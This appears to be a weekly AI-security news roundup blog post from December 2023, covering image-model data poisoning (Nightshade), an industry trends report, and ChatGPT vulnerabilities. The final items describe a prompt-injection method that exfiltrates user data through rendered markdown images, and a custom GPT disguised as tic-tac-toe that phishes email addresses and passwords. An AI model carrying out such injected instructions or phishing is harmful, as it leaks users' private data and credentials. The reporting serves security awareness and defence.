Towards Secure AI Week 51 – The Hidden Cybersecurity Battles

Secure AI Weekly + Trusted AI Blog admin todayDecember 27, 2023 85

Background
share close

Data poisoning: how artists are sabotaging AI to take revenge on image generators

The Conversation, December 17, 2023

Consider this scenario: You’re preparing a presentation and require an image of a balloon. Opting for a text-to-image generator like Midjourney or DALL-E, you input “red balloon against a blue sky.” Unexpectedly, the generator produces an image of an egg, and a second attempt yields a watermelon image. This puzzling result could be due to ‘data poisoning,’ a significant concern in the realm of AI security and safety. Data poisoning occurs when AI models are trained on corrupted data, leading to inaccurate or unpredictable outputs. This issue becomes particularly prevalent when AI systems use indiscriminately scraped online images, which may include copyrighted material, contributing to legal disputes and challenging the integrity of the AI’s learning process.

A response to this issue is the development of tools like “Nightshade,” designed to empower artists against unauthorized use of their images. These tools subtly modify images in ways that confuse AI while appearing normal to humans. If such altered images are used in training AI models, the integrity of the data pool is compromised, leading to misclassifications and erratic results by the AI. This phenomenon is not just a technical glitch but reflects a broader challenge in the field of AI – ensuring the ethical use and sourcing of data. The consequences of data poisoning extend beyond single instances, potentially affecting related keywords and thus, the overall reliability of AI systems.

To mitigate these risks, stakeholders are exploring solutions that emphasize ethical data sourcing and usage. This approach challenges the long-held belief that online data is fair game for any purpose. Technological fixes such as ‘ensemble modeling’ and regular audits using well-curated test datasets are also being considered. These measures, alongside a growing recognition of the need for ethical AI practices, highlight the importance of addressing security and safety concerns in AI development. Data poisoning, by bringing these issues to the forefront, not only impacts AI technology but also sparks a necessary conversation about the moral rights of individuals and artists in the digital age.

Security Megatrends: The 2024 Vision for the Security Industry

Security Industry Association, December, 2023

Gleaning insights from a blend of independent research, expert focus groups, and key discussions at the Securing New Ground (SNG) conference, the Security Industry Association (SIA) annually releases its influential “Security Megatrends” report. The 2024 edition, unveiled in December 2023, offers a forward-looking analysis of the security industry, pinpointing crucial trends that will shape business and operational strategies in the coming year. The report underscores the paramount role of artificial intelligence (AI) in the security sector, highlighting its multifaceted impact and dividing it into four distinct trends: AI security, visual intelligence that transcends traditional video surveillance, the rise of generative AI, and the regulatory landscape surrounding AI. Additionally, it acknowledges the evolution of previously emerging trends like workforce development, cloud technology, cybersecurity, global tensions, and sustainability. These have now become foundational elements of the security industry, essential considerations for all leaders navigating this dynamic field.

The comprehensive 2024 Security Megatrends report, accessible for download, presents an array of data and statistics on contemporary topics crucial to the industry. These include the development of autonomous devices, advancements in quantum computing and post-quantum cryptography, and the shift towards minimizing physical credentials. This detailed information helps paint a picture of the industry’s current state and provides insights into its future direction. The report not only offers a snapshot of today’s security landscape but also acts as a predictive tool, guiding industry players in adapting to upcoming changes and challenges.

Key highlights of the 2024 report encompass a diverse range of topics that are reshaping the security industry. First and foremost is the multifaceted role of AI, which includes aspects like ensuring AI security, harnessing AI for visual intelligence beyond conventional surveillance, understanding the implications of generative AI, and navigating the evolving regulatory framework governing AI usage. The report also sheds light on the changing nature of security’s return on investment and the transformation of business models due to the adoption of Security as a Service. The influence of major technology companies, shifts in real estate optimization strategies, and the convergence of Information Technology (IT) and Operational Technology (OT) are other critical areas of focus. Additionally, the report delves into the economic shifts impacting security business models and the ethical, trust, and cybersecurity concerns associated with AI, offering a comprehensive overview essential for anyone involved in the security industry.

OpenAI releases ChatGPT data leak patch, but the issue isn’t completely fixed

Mashable, December 22, 2023

The imperative of maintaining strict confidentiality when interacting with ChatGPT, a product of OpenAI, cannot be overstated. Users are advised to avoid inputting sensitive information, as the platform has previously shown vulnerabilities that could potentially be exploited by unauthorized parties. Despite efforts by OpenAI to address these security concerns, recent events indicate that the risk of data breaches still exists. A report by Bleeping Computer highlighted a significant issue where ChatGPT could inadvertently expose user data, including personal conversations and metadata such as user IDs and session information, to unauthorized third parties. This revelation underscores the ongoing challenge of safeguarding user privacy in AI-powered platforms.

In a concerning development, security researcher Johann Rehberger discovered and exploited a flaw in OpenAI’s recently introduced custom GPTs feature. By creating a custom GPT, Rehberger demonstrated the possibility of extracting data from ChatGPT. This finding is particularly alarming considering the potential of custom GPTs, which are touted as revolutionary in the realm of AI applications, akin to the impact of the App Store on mobile apps. The ease with which Rehberger developed this custom GPT raises the specter of malicious actors using similar methods to obtain sensitive data from unsuspecting users. This incident serves as a stark reminder of the vulnerabilities inherent in emerging technologies and the importance of continuous vigilance in cybersecurity.

Rehberger first brought this “data exfiltration technique” to OpenAI’s attention in April and further elaborated on his method in November. Following this, OpenAI issued a patch to address the leak. Rehberger, on his website, acknowledged the effort as a positive step towards mitigating the vulnerability, although he suggested that the fix was not entirely comprehensive. This ongoing situation with ChatGPT highlights a critical aspect of AI development and deployment: the need for robust security measures to protect against data breaches. It serves as a cautionary tale for both developers and users of AI technologies, emphasizing the importance of prioritizing security and safety in this rapidly evolving field.

Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

Security Week, December 22, 2023

A recent discovery by researchers highlights a significant vulnerability in artificial intelligence systems, specifically in the domain of Generative Pre-trained Transformers (GPTs). This vulnerability allows malicious actors to create custom GPTs capable of phishing for user credentials and transmitting this sensitive information to an external server. Researchers Johann Rehberger and Roman Samoilenko independently identified this security flaw in ChatGPT in the spring of 2023. They found that ChatGPT could be susceptible to a prompt injection attack, which involves manipulating the chatbot to process markdown images incorrectly. This vulnerability allows attackers to extract sensitive information from users’ interactions with ChatGPT, either by duping them into pasting harmful content from a malicious website or by prompting ChatGPT to summarize content from a website embedded with specially crafted code.

The exploit’s mechanism relies on markdown images processed by ChatGPT, which could be as subtle as a single-pixel image hosted on the attacker’s site. Initially, when OpenAI, the creators of ChatGPT, were informed about this attack method, they did not plan to address it, considering it a feature rather than a flaw. In contrast, similar issues found in other chatbots, such as Bing Chat, Google’s Bard, and Anthropic Claud, were quickly fixed by their developers. Recently, OpenAI began implementing measures to mitigate this attack method, specifically for the web application. These mitigations, however, are not foolproof and do not extend to mobile applications. Nonetheless, they are seen as a step in the right direction. In November, OpenAI enabled Plus and Enterprise users of ChatGPT to create their custom GPTs for particular tasks or themes, raising concerns about the potential misuse of this feature.

Exploiting this new functionality, Rehberger developed a deceptive custom GPT named ‘The Thief’, designed to trick users into revealing their email addresses and passwords. The GPT, masquerading as a Tic-tac-toe game, asks for the user’s email for a ‘personalized experience’ and password as part of a ‘security process.’ Unbeknownst to the user, this information is then clandestinely sent to an attacker-controlled server. Prior to OpenAI rolling out mitigations on December 12, Rehberger published a blog post outlining how the image markdown injection issue could be leveraged, particularly in conjunction with custom versions of ChatGPT. He also highlighted the potential risk of malicious GPTs being published on the official GPTStore, despite OpenAI’s system designed to prevent the publishing of overtly malicious GPTs. This development underscores the complex security challenges in AI, where innovative features can inadvertently create opportunities for cyber threats, necessitating continuous and proactive security measures.

 

Subscribe for updates

Stay up to date with what is happening! Get a first look at news, noteworthy research and worst attacks on AI delivered right in your inbox.

    Written by: admin

    Rate it
    Previous post